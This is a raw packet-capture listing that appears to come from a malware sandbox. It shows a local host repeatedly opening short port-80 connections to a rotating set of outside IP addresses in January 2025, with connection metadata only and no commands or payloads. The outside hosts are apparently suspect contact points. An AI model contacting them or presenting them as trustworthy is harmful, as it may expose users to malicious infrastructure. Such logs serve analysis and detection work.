                                                                                                                                                                              Jan 11, 2025 03:58:45.794353008 CET4980980192.168.11.2013.248.169.48
                                                                                                                                                                              Jan 11, 2025 03:58:45.797969103 CET4980980192.168.11.2013.248.169.48
                                                                                                                                                                              Jan 11, 2025 03:58:45.797992945 CET4980980192.168.11.2013.248.169.48
                                                                                                                                                                              Jan 11, 2025 03:58:45.934653044 CET804980913.248.169.48192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:58:45.934839010 CET4980980192.168.11.2013.248.169.48
                                                                                                                                                                              Jan 11, 2025 03:58:45.934866905 CET804980913.248.169.48192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:58:45.935010910 CET4980980192.168.11.2013.248.169.48
                                                                                                                                                                              Jan 11, 2025 03:58:45.979006052 CET804980913.248.169.48192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:58:46.071504116 CET804980913.248.169.48192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:58:46.071754932 CET804980913.248.169.48192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:58:46.071763992 CET804980913.248.169.48192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:58:46.071906090 CET4980980192.168.11.2013.248.169.48
                                                                                                                                                                              Jan 11, 2025 03:58:47.313884020 CET4980980192.168.11.2013.248.169.48
                                                                                                                                                                              Jan 11, 2025 03:58:48.330075979 CET4981080192.168.11.2013.248.169.48
                                                                                                                                                                              Jan 11, 2025 03:58:49.344022036 CET4981080192.168.11.2013.248.169.48
                                                                                                                                                                              Jan 11, 2025 03:58:49.480846882 CET804981013.248.169.48192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:58:49.480989933 CET4981080192.168.11.2013.248.169.48
                                                                                                                                                                              Jan 11, 2025 03:58:49.483393908 CET4981080192.168.11.2013.248.169.48
                                                                                                                                                                              Jan 11, 2025 03:58:49.663857937 CET804981013.248.169.48192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:58:50.627265930 CET804981013.248.169.48192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:58:50.627276897 CET804981013.248.169.48192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:58:50.627513885 CET4981080192.168.11.2013.248.169.48
                                                                                                                                                                              Jan 11, 2025 03:58:50.628190041 CET4981080192.168.11.2013.248.169.48
                                                                                                                                                                              Jan 11, 2025 03:58:50.764688969 CET804981013.248.169.48192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:58:59.650211096 CET4981180192.168.11.20202.92.5.23
                                                                                                                                                                              Jan 11, 2025 03:59:00.007869005 CET8049811202.92.5.23192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:59:00.008147955 CET4981180192.168.11.20202.92.5.23
                                                                                                                                                                              Jan 11, 2025 03:59:00.010648966 CET4981180192.168.11.20202.92.5.23
                                                                                                                                                                              Jan 11, 2025 03:59:00.367993116 CET8049811202.92.5.23192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:59:00.368762016 CET8049811202.92.5.23192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:59:00.368792057 CET8049811202.92.5.23192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:59:00.368814945 CET8049811202.92.5.23192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:59:00.369045019 CET4981180192.168.11.20202.92.5.23
                                                                                                                                                                              Jan 11, 2025 03:59:00.369837046 CET4981180192.168.11.20202.92.5.23
                                                                                                                                                                              Jan 11, 2025 03:59:00.727185965 CET8049811202.92.5.23192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:59:05.373270035 CET4981280192.168.11.2076.223.54.146
                                                                                                                                                                              Jan 11, 2025 03:59:06.387248993 CET4981280192.168.11.2076.223.54.146
                                                                                                                                                                              Jan 11, 2025 03:59:08.402489901 CET4981280192.168.11.2076.223.54.146
                                                                                                                                                                              Jan 11, 2025 03:59:08.538321972 CET804981276.223.54.146192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:59:08.538547993 CET4981280192.168.11.2076.223.54.146
                                                                                                                                                                              Jan 11, 2025 03:59:08.542073965 CET4981280192.168.11.2076.223.54.146
                                                                                                                                                                              Jan 11, 2025 03:59:08.677784920 CET804981276.223.54.146192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:59:08.677881956 CET804981276.223.54.146192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:59:08.678067923 CET4981280192.168.11.2076.223.54.146
                                                                                                                                                                              Jan 11, 2025 03:59:10.043381929 CET4981280192.168.11.2076.223.54.146
                                                                                                                                                                              Jan 11, 2025 03:59:11.059401035 CET4981380192.168.11.2076.223.54.146
                                                                                                                                                                              Jan 11, 2025 03:59:11.195832014 CET804981376.223.54.146192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:59:11.195981026 CET4981380192.168.11.2076.223.54.146
                                                                                                                                                                              Jan 11, 2025 03:59:11.199618101 CET4981380192.168.11.2076.223.54.146
                                                                                                                                                                              Jan 11, 2025 03:59:11.335268021 CET804981376.223.54.146192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:59:11.335283041 CET804981376.223.54.146192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:59:11.335536003 CET4981380192.168.11.2076.223.54.146
                                                                                                                                                                              Jan 11, 2025 03:59:12.714553118 CET4981380192.168.11.2076.223.54.146
                                                                                                                                                                              Jan 11, 2025 03:59:13.730827093 CET4981480192.168.11.2076.223.54.146
                                                                                                                                                                              Jan 11, 2025 03:59:13.869432926 CET804981476.223.54.146192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:59:13.869720936 CET4981480192.168.11.2076.223.54.146
                                                                                                                                                                              Jan 11, 2025 03:59:13.873342991 CET4981480192.168.11.2076.223.54.146
                                                                                                                                                                              Jan 11, 2025 03:59:13.873366117 CET4981480192.168.11.2076.223.54.146
                                                                                                                                                                              Jan 11, 2025 03:59:13.873442888 CET4981480192.168.11.2076.223.54.146
                                                                                                                                                                              Jan 11, 2025 03:59:14.010114908 CET804981476.223.54.146192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:59:14.010334969 CET804981476.223.54.146192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:59:14.010574102 CET804981476.223.54.146192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:59:14.010816097 CET804981476.223.54.146192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:59:14.010824919 CET804981476.223.54.146192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:59:14.010947943 CET4981480192.168.11.2076.223.54.146
                                                                                                                                                                              Jan 11, 2025 03:59:15.385854959 CET4981480192.168.11.2076.223.54.146
                                                                                                                                                                              Jan 11, 2025 03:59:16.402050972 CET4981580192.168.11.2076.223.54.146
                                                                                                                                                                              Jan 11, 2025 03:59:17.416081905 CET4981580192.168.11.2076.223.54.146
                                                                                                                                                                              Jan 11, 2025 03:59:17.552150965 CET804981576.223.54.146192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:59:17.552304983 CET4981580192.168.11.2076.223.54.146
                                                                                                                                                                              Jan 11, 2025 03:59:17.554754019 CET4981580192.168.11.2076.223.54.146
                                                                                                                                                                              Jan 11, 2025 03:59:17.697875023 CET804981576.223.54.146192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:59:17.697885036 CET804981576.223.54.146192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:59:17.698245049 CET4981580192.168.11.2076.223.54.146
                                                                                                                                                                              Jan 11, 2025 03:59:17.699044943 CET4981580192.168.11.2076.223.54.146
                                                                                                                                                                              Jan 11, 2025 03:59:17.834846973 CET804981576.223.54.146192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:59:22.713185072 CET4981680192.168.11.20209.74.77.109
                                                                                                                                                                              Jan 11, 2025 03:59:22.885827065 CET8049816209.74.77.109192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:59:22.885974884 CET4981680192.168.11.20209.74.77.109
                                                                                                                                                                              Jan 11, 2025 03:59:22.889581919 CET4981680192.168.11.20209.74.77.109
                                                                                                                                                                              Jan 11, 2025 03:59:23.062304974 CET8049816209.74.77.109192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:59:23.068051100 CET8049816209.74.77.109192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:59:23.068093061 CET8049816209.74.77.109192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:59:23.068249941 CET4981680192.168.11.20209.74.77.109
                                                                                                                                                                              Jan 11, 2025 03:59:24.399646044 CET4981680192.168.11.20209.74.77.109
                                                                                                                                                                              Jan 11, 2025 03:59:25.415699005 CET4981780192.168.11.20209.74.77.109
                                                                                                                                                                              Jan 11, 2025 03:59:25.588022947 CET8049817209.74.77.109192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:59:25.588274002 CET4981780192.168.11.20209.74.77.109
                                                                                                                                                                              Jan 11, 2025 03:59:25.591824055 CET4981780192.168.11.20209.74.77.109
                                                                                                                                                                              Jan 11, 2025 03:59:25.764081001 CET8049817209.74.77.109192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:59:25.769299984 CET8049817209.74.77.109192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:59:25.769340992 CET8049817209.74.77.109192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:59:25.769546032 CET4981780192.168.11.20209.74.77.109
                                                                                                                                                                              Jan 11, 2025 03:59:27.102056026 CET4981780192.168.11.20209.74.77.109
                                                                                                                                                                              Jan 11, 2025 03:59:28.118273973 CET4981880192.168.11.20209.74.77.109
                                                                                                                                                                              Jan 11, 2025 03:59:28.290730000 CET8049818209.74.77.109192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:59:28.290965080 CET4981880192.168.11.20209.74.77.109
                                                                                                                                                                              Jan 11, 2025 03:59:28.294581890 CET4981880192.168.11.20209.74.77.109
                                                                                                                                                                              Jan 11, 2025 03:59:28.294661999 CET4981880192.168.11.20209.74.77.109
                                                                                                                                                                              Jan 11, 2025 03:59:28.467005968 CET8049818209.74.77.109192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:59:28.467169046 CET8049818209.74.77.109192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:59:28.467649937 CET8049818209.74.77.109192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:59:28.467896938 CET8049818209.74.77.109192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:59:28.474991083 CET8049818209.74.77.109192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:59:28.475004911 CET8049818209.74.77.109192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:59:28.475159883 CET4981880192.168.11.20209.74.77.109
                                                                                                                                                                              Jan 11, 2025 03:59:29.804603100 CET4981880192.168.11.20209.74.77.109
                                                                                                                                                                              Jan 11, 2025 03:59:30.820734024 CET4981980192.168.11.20209.74.77.109
                                                                                                                                                                              Jan 11, 2025 03:59:30.993052959 CET8049819209.74.77.109192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:59:30.993237972 CET4981980192.168.11.20209.74.77.109
                                                                                                                                                                              Jan 11, 2025 03:59:30.995647907 CET4981980192.168.11.20209.74.77.109
                                                                                                                                                                              Jan 11, 2025 03:59:31.168211937 CET8049819209.74.77.109192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:59:31.175900936 CET8049819209.74.77.109192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:59:31.175946951 CET8049819209.74.77.109192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:59:31.176178932 CET4981980192.168.11.20209.74.77.109
                                                                                                                                                                              Jan 11, 2025 03:59:31.176796913 CET4981980192.168.11.20209.74.77.109
                                                                                                                                                                              Jan 11, 2025 03:59:31.349112988 CET8049819209.74.77.109192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:59:41.183568001 CET4982780192.168.11.2027.124.4.246
                                                                                                                                                                              Jan 11, 2025 03:59:41.484497070 CET804982727.124.4.246192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:59:41.484667063 CET4982780192.168.11.2027.124.4.246
                                                                                                                                                                              Jan 11, 2025 03:59:41.488176107 CET4982780192.168.11.2027.124.4.246
                                                                                                                                                                              Jan 11, 2025 03:59:41.786242962 CET804982727.124.4.246192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:59:41.789369106 CET804982727.124.4.246192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:59:41.789474010 CET804982727.124.4.246192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:59:41.789743900 CET4982780192.168.11.2027.124.4.246
                                                                                                                                                                              Jan 11, 2025 03:59:42.993830919 CET4982780192.168.11.2027.124.4.246
                                                                                                                                                                              Jan 11, 2025 03:59:44.004784107 CET4982980192.168.11.2027.124.4.246
                                                                                                                                                                              Jan 11, 2025 03:59:44.316925049 CET804982927.124.4.246192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:59:44.317147970 CET4982980192.168.11.2027.124.4.246
                                                                                                                                                                              Jan 11, 2025 03:59:44.320941925 CET4982980192.168.11.2027.124.4.246
                                                                                                                                                                              Jan 11, 2025 03:59:44.629468918 CET804982927.124.4.246192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:59:44.633162975 CET804982927.124.4.246192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:59:44.633258104 CET804982927.124.4.246192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:59:44.633394957 CET4982980192.168.11.2027.124.4.246
                                                                                                                                                                              Jan 11, 2025 03:59:45.831234932 CET4982980192.168.11.2027.124.4.246
                                                                                                                                                                              Jan 11, 2025 03:59:46.833374023 CET4983080192.168.11.2027.124.4.246
                                                                                                                                                                              Jan 11, 2025 03:59:47.128577948 CET804983027.124.4.246192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:59:47.128786087 CET4983080192.168.11.2027.124.4.246
                                                                                                                                                                              Jan 11, 2025 03:59:47.133862972 CET4983080192.168.11.2027.124.4.246
                                                                                                                                                                              Jan 11, 2025 03:59:47.133928061 CET4983080192.168.11.2027.124.4.246
                                                                                                                                                                              Jan 11, 2025 03:59:47.424042940 CET804983027.124.4.246192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:59:47.428894043 CET804983027.124.4.246192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:59:47.428934097 CET804983027.124.4.246192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:59:47.429090977 CET804983027.124.4.246192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:59:47.429102898 CET4983080192.168.11.2027.124.4.246
                                                                                                                                                                              Jan 11, 2025 03:59:47.429122925 CET804983027.124.4.246192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:59:47.429372072 CET804983027.124.4.246192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:59:47.429400921 CET804983027.124.4.246192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:59:47.429734945 CET804983027.124.4.246192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:59:47.724154949 CET804983027.124.4.246192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:59:49.663155079 CET4983180192.168.11.2027.124.4.246
                                                                                                                                                                              Jan 11, 2025 03:59:49.968736887 CET804983127.124.4.246192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:59:49.968957901 CET4983180192.168.11.2027.124.4.246
                                                                                                                                                                              Jan 11, 2025 03:59:49.971379042 CET4983180192.168.11.2027.124.4.246
                                                                                                                                                                              Jan 11, 2025 03:59:50.274688959 CET804983127.124.4.246192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:59:50.276926041 CET804983127.124.4.246192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:59:50.277000904 CET804983127.124.4.246192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:59:50.277219057 CET4983180192.168.11.2027.124.4.246
                                                                                                                                                                              Jan 11, 2025 03:59:50.277811050 CET4983180192.168.11.2027.124.4.246
                                                                                                                                                                              Jan 11, 2025 03:59:50.583050013 CET804983127.124.4.246192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:59:55.292401075 CET4983280192.168.11.2046.30.211.38
                                                                                                                                                                              Jan 11, 2025 03:59:55.514451981 CET804983246.30.211.38192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:59:55.514770985 CET4983280192.168.11.2046.30.211.38
                                                                                                                                                                              Jan 11, 2025 03:59:55.518316031 CET4983280192.168.11.2046.30.211.38
                                                                                                                                                                              Jan 11, 2025 03:59:55.740334988 CET804983246.30.211.38192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:59:55.740731955 CET804983246.30.211.38192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:59:55.740751028 CET804983246.30.211.38192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:59:55.740907907 CET4983280192.168.11.2046.30.211.38
                                                                                                                                                                              Jan 11, 2025 03:59:57.021022081 CET4983280192.168.11.2046.30.211.38
                                                                                                                                                                              Jan 11, 2025 03:59:58.036385059 CET4983380192.168.11.2046.30.211.38
                                                                                                                                                                              Jan 11, 2025 03:59:58.262239933 CET804983346.30.211.38192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:59:58.262384892 CET4983380192.168.11.2046.30.211.38
                                                                                                                                                                              Jan 11, 2025 03:59:58.266012907 CET4983380192.168.11.2046.30.211.38
                                                                                                                                                                              Jan 11, 2025 03:59:58.491944075 CET804983346.30.211.38192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:59:58.492043972 CET804983346.30.211.38192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:59:58.492054939 CET804983346.30.211.38192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:59:58.492319107 CET4983380192.168.11.2046.30.211.38
                                                                                                                                                                              Jan 11, 2025 03:59:59.774475098 CET4983380192.168.11.2046.30.211.38
                                                                                                                                                                              Jan 11, 2025 04:00:00.790693045 CET4983480192.168.11.2046.30.211.38
                                                                                                                                                                              Jan 11, 2025 04:00:01.012537003 CET804983446.30.211.38192.168.11.20
                                                                                                                                                                              Jan 11, 2025 04:00:01.012718916 CET4983480192.168.11.2046.30.211.38
                                                                                                                                                                              Jan 11, 2025 04:00:01.016321898 CET4983480192.168.11.2046.30.211.38
                                                                                                                                                                              Jan 11, 2025 04:00:01.016346931 CET4983480192.168.11.2046.30.211.38
                                                                                                                                                                              Jan 11, 2025 04:00:01.016426086 CET4983480192.168.11.2046.30.211.38
                                                                                                                                                                              Jan 11, 2025 04:00:01.238302946 CET804983446.30.211.38192.168.11.20
                                                                                                                                                                              Jan 11, 2025 04:00:01.238326073 CET804983446.30.211.38192.168.11.20
                                                                                                                                                                              Jan 11, 2025 04:00:01.238575935 CET804983446.30.211.38192.168.11.20
                                                                                                                                                                              Jan 11, 2025 04:00:01.239032984 CET804983446.30.211.38192.168.11.20
                                                                                                                                                                              Jan 11, 2025 04:00:01.239249945 CET804983446.30.211.38192.168.11.20
                                                                                                                                                                              Jan 11, 2025 04:00:01.239260912 CET804983446.30.211.38192.168.11.20
                                                                                                                                                                              Jan 11, 2025 04:00:01.239377975 CET4983480192.168.11.2046.30.211.38
                                                                                                                                                                              Jan 11, 2025 04:00:02.526808977 CET4983480192.168.11.2046.30.211.38
                                                                                                                                                                              Jan 11, 2025 04:00:03.537626028 CET4983580192.168.11.2046.30.211.38
                                                                                                                                                                              Jan 11, 2025 04:00:03.763058901 CET804983546.30.211.38192.168.11.20
                                                                                                                                                                              Jan 11, 2025 04:00:03.763216019 CET4983580192.168.11.2046.30.211.38
                                                                                                                                                                              Jan 11, 2025 04:00:03.765655041 CET4983580192.168.11.2046.30.211.38
                                                                                                                                                                              Jan 11, 2025 04:00:03.991019011 CET804983546.30.211.38192.168.11.20
                                                                                                                                                                              Jan 11, 2025 04:00:03.991146088 CET804983546.30.211.38192.168.11.20
                                                                                                                                                                              Jan 11, 2025 04:00:03.991153955 CET804983546.30.211.38192.168.11.20
                                                                                                                                                                              Jan 11, 2025 04:00:03.991441011 CET4983580192.168.11.2046.30.211.38
                                                                                                                                                                              Jan 11, 2025 04:00:03.992115974 CET4983580192.168.11.2046.30.211.38
                                                                                                                                                                              Jan 11, 2025 04:00:04.217459917 CET804983546.30.211.38192.168.11.20
                                                                                                                                                                              Jan 11, 2025 04:00:08.999250889 CET4983780192.168.11.20103.224.182.242
                                                                                                                                                                              Jan 11, 2025 04:00:09.168438911 CET8049837103.224.182.242192.168.11.20
                                                                                                                                                                              Jan 11, 2025 04:00:09.168695927 CET4983780192.168.11.20103.224.182.242
                                                                                                                                                                              Jan 11, 2025 04:00:09.172243118 CET4983780192.168.11.20103.224.182.242
                                                                                                                                                                              Jan 11, 2025 04:00:09.346985102 CET8049837103.224.182.242192.168.11.20
                                                                                                                                                                              Jan 11, 2025 04:00:09.346992970 CET8049837103.224.182.242192.168.11.20
                                                                                                                                                                              Jan 11, 2025 04:00:09.347194910 CET4983780192.168.11.20103.224.182.242
                                                                                                                                                                              Jan 11, 2025 04:00:10.679285049 CET4983780192.168.11.20103.224.182.242
                                                                                                                                                                              Jan 11, 2025 04:00:11.695389032 CET4983880192.168.11.20103.224.182.242
                                                                                                                                                                              Jan 11, 2025 04:00:11.864563942 CET8049838103.224.182.242192.168.11.20
                                                                                                                                                                              Jan 11, 2025 04:00:11.864739895 CET4983880192.168.11.20103.224.182.242
                                                                                                                                                                              Jan 11, 2025 04:00:11.868295908 CET4983880192.168.11.20103.224.182.242
                                                                                                                                                                              Jan 11, 2025 04:00:12.052470922 CET8049838103.224.182.242192.168.11.20
                                                                                                                                                                              Jan 11, 2025 04:00:12.052480936 CET8049838103.224.182.242192.168.11.20
                                                                                                                                                                              Jan 11, 2025 04:00:12.052650928 CET4983880192.168.11.20103.224.182.242
                                                                                                                                                                              Jan 11, 2025 04:00:13.373775005 CET4983880192.168.11.20103.224.182.242
                                                                                                                                                                              Jan 11, 2025 04:00:14.380268097 CET4983980192.168.11.20103.224.182.242
                                                                                                                                                                              Jan 11, 2025 04:00:14.549413919 CET8049839103.224.182.242192.168.11.20
                                                                                                                                                                              Jan 11, 2025 04:00:14.549664021 CET4983980192.168.11.20103.224.182.242
                                                                                                                                                                              Jan 11, 2025 04:00:14.553235054 CET4983980192.168.11.20103.224.182.242
                                                                                                                                                                              Jan 11, 2025 04:00:14.553253889 CET4983980192.168.11.20103.224.182.242
                                                                                                                                                                              Jan 11, 2025 04:00:14.553335905 CET4983980192.168.11.20103.224.182.242
                                                                                                                                                                              Jan 11, 2025 04:00:14.724086046 CET8049839103.224.182.242192.168.11.20
                                                                                                                                                                              Jan 11, 2025 04:00:14.729598045 CET8049839103.224.182.242192.168.11.20
                                                                                                                                                                              Jan 11, 2025 04:00:14.729613066 CET8049839103.224.182.242192.168.11.20
                                                                                                                                                                              Jan 11, 2025 04:00:14.729798079 CET4983980192.168.11.20103.224.182.242
                                                                                                                                                                              Jan 11, 2025 04:00:16.062685013 CET4983980192.168.11.20103.224.182.242
                                                                                                                                                                              Jan 11, 2025 04:00:17.075417042 CET4984080192.168.11.20103.224.182.242
                                                                                                                                                                              Jan 11, 2025 04:00:17.244910955 CET8049840103.224.182.242192.168.11.20
                                                                                                                                                                              Jan 11, 2025 04:00:17.245122910 CET4984080192.168.11.20103.224.182.242
                                                                                                                                                                              Jan 11, 2025 04:00:17.247589111 CET4984080192.168.11.20103.224.182.242
                                                                                                                                                                              Jan 11, 2025 04:00:17.433700085 CET8049840103.224.182.242192.168.11.20
                                                                                                                                                                              Jan 11, 2025 04:00:17.433710098 CET8049840103.224.182.242192.168.11.20
                                                                                                                                                                              Jan 11, 2025 04:00:17.433825016 CET8049840103.224.182.242192.168.11.20
                                                                                                                                                                              Jan 11, 2025 04:00:17.434037924 CET4984080192.168.11.20103.224.182.242
                                                                                                                                                                              Jan 11, 2025 04:00:17.434037924 CET4984080192.168.11.20103.224.182.242
                                                                                                                                                                              Jan 11, 2025 04:00:17.434662104 CET4984080192.168.11.20103.224.182.242
                                                                                                                                                                              Jan 11, 2025 04:00:17.603816032 CET8049840103.224.182.242192.168.11.20
                                                                                                                                                                              Jan 11, 2025 04:01:55.155370951 CET4984880192.168.11.20101.35.209.183
                                                                                                                                                                              Jan 11, 2025 04:01:55.458719015 CET8049848101.35.209.183192.168.11.20
                                                                                                                                                                              Jan 11, 2025 04:01:55.458843946 CET4984880192.168.11.20101.35.209.183
                                                                                                                                                                              Jan 11, 2025 04:01:55.462804079 CET4984880192.168.11.20101.35.209.183
                                                                                                                                                                              Jan 11, 2025 04:01:55.768196106 CET8049848101.35.209.183192.168.11.20
                                                                                                                                                                              Jan 11, 2025 04:01:55.768549919 CET8049848101.35.209.183192.168.11.20
                                                                                                                                                                              Jan 11, 2025 04:01:55.768594027 CET8049848101.35.209.183192.168.11.20
                                                                                                                                                                              Jan 11, 2025 04:01:55.768799067 CET4984880192.168.11.20101.35.209.183
                                                                                                                                                                              Jan 11, 2025 04:01:56.964334965 CET4984880192.168.11.20101.35.209.183
                                                                                                                                                                              Jan 11, 2025 04:01:57.977950096 CET4984980192.168.11.20101.35.209.183
                                                                                                                                                                              Jan 11, 2025 04:01:58.280364037 CET8049849101.35.209.183192.168.11.20
                                                                                                                                                                              Jan 11, 2025 04:01:58.280540943 CET4984980192.168.11.20101.35.209.183
                                                                                                                                                                              Jan 11, 2025 04:01:58.284071922 CET4984980192.168.11.20101.35.209.183
                                                                                                                                                                              Jan 11, 2025 04:01:58.586396933 CET8049849101.35.209.183192.168.11.20
                                                                                                                                                                              Jan 11, 2025 04:01:58.586853027 CET8049849101.35.209.183192.168.11.20
                                                                                                                                                                              Jan 11, 2025 04:01:58.587014914 CET8049849101.35.209.183192.168.11.20
                                                                                                                                                                              Jan 11, 2025 04:01:58.587137938 CET4984980192.168.11.20101.35.209.183
                                                                                                                                                                              Jan 11, 2025 04:01:59.794018030 CET4984980192.168.11.20101.35.209.183
                                                                                                                                                                              Jan 11, 2025 04:02:00.800230980 CET4985080192.168.11.20101.35.209.183
                                                                                                                                                                              Jan 11, 2025 04:02:01.121746063 CET8049850101.35.209.183192.168.11.20
                                                                                                                                                                              Jan 11, 2025 04:02:01.121938944 CET4985080192.168.11.20101.35.209.183
                                                                                                                                                                              Jan 11, 2025 04:02:01.125547886 CET4985080192.168.11.20101.35.209.183
                                                                                                                                                                              Jan 11, 2025 04:02:01.125627041 CET4985080192.168.11.20101.35.209.183
                                                                                                                                                                              Jan 11, 2025 04:02:01.446916103 CET8049850101.35.209.183192.168.11.20
                                                                                                                                                                              Jan 11, 2025 04:02:01.447159052 CET8049850101.35.209.183192.168.11.20
                                                                                                                                                                              Jan 11, 2025 04:02:01.447169065 CET8049850101.35.209.183192.168.11.20
                                                                                                                                                                              Jan 11, 2025 04:02:01.447448969 CET8049850101.35.209.183192.168.11.20
                                                                                                                                                                              Jan 11, 2025 04:02:01.447458982 CET8049850101.35.209.183192.168.11.20
                                                                                                                                                                              Jan 11, 2025 04:02:01.447630882 CET8049850101.35.209.183192.168.11.20
                                                                                                                                                                              Jan 11, 2025 04:02:01.447875023 CET8049850101.35.209.183192.168.11.20
                                                                                                                                                                              Jan 11, 2025 04:02:01.447990894 CET8049850101.35.209.183192.168.11.20
                                                                                                                                                                              Jan 11, 2025 04:02:01.448000908 CET8049850101.35.209.183192.168.11.20
                                                                                                                                                                              Jan 11, 2025 04:02:01.448164940 CET4985080192.168.11.20101.35.209.183
                                                                                                                                                                              Jan 11, 2025 04:02:02.634876013 CET4985080192.168.11.20101.35.209.183
                                                                                                                                                                              Jan 11, 2025 04:02:03.645250082 CET4985180192.168.11.20101.35.209.183
                                                                                                                                                                              Jan 11, 2025 04:02:03.965598106 CET8049851101.35.209.183192.168.11.20
                                                                                                                                                                              Jan 11, 2025 04:02:03.965742111 CET4985180192.168.11.20101.35.209.183
                                                                                                                                                                              Jan 11, 2025 04:02:03.968141079 CET4985180192.168.11.20101.35.209.183
                                                                                                                                                                              Jan 11, 2025 04:02:04.288678885 CET8049851101.35.209.183192.168.11.20
                                                                                                                                                                              Jan 11, 2025 04:02:04.288980007 CET8049851101.35.209.183192.168.11.20
                                                                                                                                                                              Jan 11, 2025 04:02:04.289024115 CET8049851101.35.209.183192.168.11.20
                                                                                                                                                                              Jan 11, 2025 04:02:04.289280891 CET4985180192.168.11.20101.35.209.183
                                                                                                                                                                              Jan 11, 2025 04:02:04.289994955 CET4985180192.168.11.20101.35.209.183
                                                                                                                                                                              Jan 11, 2025 04:02:04.612097979 CET8049851101.35.209.183192.168.11.20
                                                                                                                                                                              Jan 11, 2025 04:02:09.291565895 CET4985280192.168.11.20154.23.178.231
                                                                                                                                                                              Jan 11, 2025 04:02:09.596366882 CET8049852154.23.178.231192.168.11.20
                                                                                                                                                                              Jan 11, 2025 04:02:09.596539021 CET4985280192.168.11.20154.23.178.231
                                                                                                                                                                              Jan 11, 2025 04:02:09.600085020 CET4985280192.168.11.20154.23.178.231
                                                                                                                                                                              Jan 11, 2025 04:02:09.904984951 CET8049852154.23.178.231192.168.11.20
                                                                                                                                                                              Jan 11, 2025 04:02:09.905251980 CET8049852154.23.178.231192.168.11.20
                                                                                                                                                                              Jan 11, 2025 04:02:09.905499935 CET4985280192.168.11.20154.23.178.231
                                                                                                                                                                              Jan 11, 2025 04:02:11.111927032 CET4985280192.168.11.20154.23.178.231
                                                                                                                                                                              Jan 11, 2025 04:02:12.116837978 CET4985380192.168.11.20154.23.178.231
                                                                                                                                                                              Jan 11, 2025 04:02:12.421610117 CET8049853154.23.178.231192.168.11.20
                                                                                                                                                                              Jan 11, 2025 04:02:12.421798944 CET4985380192.168.11.20154.23.178.231
